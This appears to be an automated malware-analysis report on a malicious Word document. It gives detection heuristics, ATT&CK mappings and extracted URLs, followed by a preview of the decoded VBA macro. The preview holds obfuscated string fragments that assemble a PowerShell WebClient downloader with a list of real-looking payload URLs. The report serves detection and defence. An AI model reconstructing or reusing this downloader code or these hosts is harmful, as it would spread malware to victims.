MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a command, likely to download and run a second-stage payload from the reconstructed URL 'http://ecocleanlublin4sX+4sXpl/V4sX+4sXmJWtp+WtpT4'. The presence of a password-protected archive lure heuristic suggests the document is designed to trick users into disabling security measures. The ClamAV detection 'Img.Dropper.PhishingLure-6443153-0' further supports its malicious nature.
Heuristics 8
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ecocleanlublin4sX+4sX.4sX+4sXpl/V4sX+4sXmJWtp+WtpT4 In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 71521 bytes |
SHA-256: 47ca75bd158a21dfb974fa9b917b0fdbcd8f14aa9d70883d49ec630ae15711b4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "HiLwwbzDHw"
Function knLzCYiMoocpuh()
MAJnpp = UCase("plCSBtE" + "POXhSlH" + "dTzllGij" + "nkMBrfjMN" + "GPkjUvt") + UCase("JfuwTlvVVzAR" + "GVEOIsEXjoUF" + "ButncprZVATp" + "bGWJkMvRz" + "fRMCpJarZtijAc")
PLqMbK = Mid("tmY3M8P4,15,25]-jOInWtpWtp) (((Wtp(4sWtp+WtpX4v2franc =4sX+Wtp+Wtp4sX new-4sX'+'+4sXobjec4sX+4sXt4sX+4sX Sy4sX+4Wtp+WtpsXstem.Net.W4sX+4sXebClio1Fi2", 8, 136)
diXvhDj = UCase("CiurDoM" + "jsoIvwGKqwE" + "wpXKoWFjfE" + "nzJNDHGI" + "irhjpIX") + UCase("solIGjJNGjDjj" + "zchALllDDjp" + "qEHrUjw" + "qrSDhNAzw" + "CbRFsFzpwm")
fTrswrkjnsa = UCase("WKaKlUlZrRzB" + "EIJSCANVQn" + "QuJuvir" + "ubNBVHO" + "usUlsHBnQj") + UCase("hzPNFXXuq" + "qdIZrHzq" + "oKnbScwC" + "ItViMRKG" + "OIdzNYNEPML")
BAPEqf = UCase("JznpSMHKjOsm" + "BnaMavwJ" + "dVVjVQYwbIGcj" + "PwHnzPuPG" + "zzKPjphQXQUS") + UCase("jqrmknkffU" + "LQTIztwNOp" + "WFIPlaqEQuzc" + "wHcKcWATil" + "TWZQdSH")
SsfzcBBjAzi = Mid("mNFjCBC0aBj5kEch00qerolWtp+Wtpimitm4sX+4sXarketi4sX+'+'4sXn'+'4sX+4sXg4sX+4sX.4'+'sX+4sXcomWt'+'p+Wtp/JKDw/,httpsWtp+Wtp4sWtp+WtpX+4sX://malea4sX+4sXdUiP1HsFijaHkM", 20, 131)
vwfZUPn = UCase("ADzJvFt" + "wkJVOlzpMQ" + "PkcjhdqwPOONj" + "IIpYURMQjidzH" + "caXrwVvRXUPf") + UCase("IiJiWZi" + "dHRrziz" + "uFiVHUo" + "WPOvrkVJpMDma" + "GZddzTGAwqwQcO")
PXwvl = UCase("izUldVB" + "paEiNnvL" + "QoksoQsTEvOAa" + "zmuwYbVzpaM" + "tZHqjbNY") + UCase("iWKqicSZ" + "nJOzGrTpWk" + "RzJjcXSMNP" + "nBOTQjHqzDZP" + "DwuTPXqFdCviM")
sCXOhHBKIp = UCase("zAELbZEQcoKPZc" + "kuusjTztcEz" + "hmtYwIbVrdE" + "zUjojFshHnHD" + "icaCHbGivW") + UCase("iPOGzHkHpNv" + "nIJWMPWuf" + "ASfASjBwCCzCF" + "rljADANKjN" + "uzFtOZczsPvaz")
ajqjDjQi = Mid("MqUjD0i9QbCDNHHoO2X+4sXsQU/bP6.SpWtp+WtpliWtp+Wtpt'+'(Wtp+WtpbP'+'64sX+4sX,bP6);4v2karapas4sX+4sX ='+' 4v2nsadasd.n4sX+4sX'+'ext(14sX+4sX, 343245);4v2huas =4sX+4sX 4sX+4mHWTZuGzDXawA1", 19, 151)
SlzHa = UCase("NLKFMKAVNkm" + "jhfkSsjWcjc" + "zqYhJwToDFuipw" + "FnhjJjnnJ" + "skCvqBjiKH") + UCase("lTLORwXimA" + "TfiivzTSKDPHRO" + "tMDNwirrT" + "VUriPIWYzR" + "QHGjOszSWL")
UTtBpfBfWQ = UCase("AFqKsRkCqfajV" + "ibqjSMXlwEodU" + "MEwLmLC" + "XzqvDsHZThDlUQ" + "MIkRPIlVPz") + UCase("pljPuJojEqtX" + "fiWlHZii" + "fjDBummldazVDV" + "EmuzkMhTkallm" + "OqPwtFz")
ksDQY = UCase("LoqSiRmdGb" + "QiJmvSk" + "pzavVfHwmTI" + "bmzNQfhdrMzST" + "trHhZYzopWks") + UCase("nXTAJwmdii" + "WQlHndwIcjlPqF" + "jpnwdcXKuGYMpT" + "IPNLLJnsALXc" + "lBHcuPPwp")
qqBIBOlz = Mid("jwEj16aEJ4tJent;44sX+4sXv2nsad4sX+4sXasd '+'4sX+4sX= new'+'-objecWtp+Wtpt rando4sX+4sXmTikz", 13, 75)
MwuMjj = UCase("sOCzTNSZ" + "cIfjUflzjwQSb" + "BAkOkiWJ" + "rsufvntUA" + "mJcGTuLi") + UCase("JHitRGA" + "iwirRSsnoazqKq" + "QGozYtRUYEV" + "HJwcZup" + "WRUVrkSf")
WOmuK = UCase("BUwFqAORIpvb" + "CfukvzmkFA" + "YtwwRaEj" + "hLqMDwrmu" + "nVKiFwAiT") + UCase("DwwTrjzCSAilLI" + "qoijwGzqqNlOO" + "zQvkkOkPXUWzo" + "tjBJBpPHSz" + "tEGGGGSjJS")
SdfmzXsk = UCase("FFiQFfnDPKtukc" + "NncKZrwfl" + "ChHDiabdYFRKoc" + "BrHWrrN" + "ZJFCivHHZtSCzj") + UCase("kjSQMWADzzFXzq" + "uGomitZY" + "iQwrQWZIVsWmYa" + "ZYGGDYX" + "QQzMOKwF")
JOpwd = Mid("jKOFlAzi6ovnIFV4t1h7R9.4sX'+'+4sXcom4sX+4sX/Bn83/,http://ecocleanlublin4sX+4sX.4sX+4sXpl/V4sX+4sXmJWtp+WtpT4'+'sX+4sXr4s'+'X+4sXWtp+Wtp/,htt4sX+4sXp://m4sXWtp+Wtp+4sXath4sX+4'+'sXemagic.Wtp+WtpZY4XhDJ9T6w", 23, 171)
iFBPD = UCase("mAbuEaRNKzRf" + "JLbNYdszzPrKiJ" + "NEPfBJtBi" + "lopEnUbY" + "wuiEKjam") + UCase("kkkaRAzFkmimP" + "sGnoCsKv" + "lUMWjAFwb" + "FQwWLWoFik" + "uWjklzXrXtipU")
iTiwTcbaob = UCase("LVhvXJmc" + "zCHTWVfnNK" + "TVXLJhbRKLzXm" + "bDtGBPTd" + "bUzztdjbzoR") + UCase("pzVmphVSNziVH" + "RmhLuTprwqJkhn" + "kAjVTmGXULh" + "KPcqipzMutltzC" + "BfcFzhpdzvznIL")
zPbFodMGooS = UCase("zjKVjmiqzjqfJ" + "jvUEUNCmwl" + "OppIzCDALfZk" + "rOzRaPYM" + "TRUdKBRqLmZoU") + UCase("tiBdnfzrJLIMFO" + "LhMUbWYnTsBj" + "TmKYXRFjYl" + "hp
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.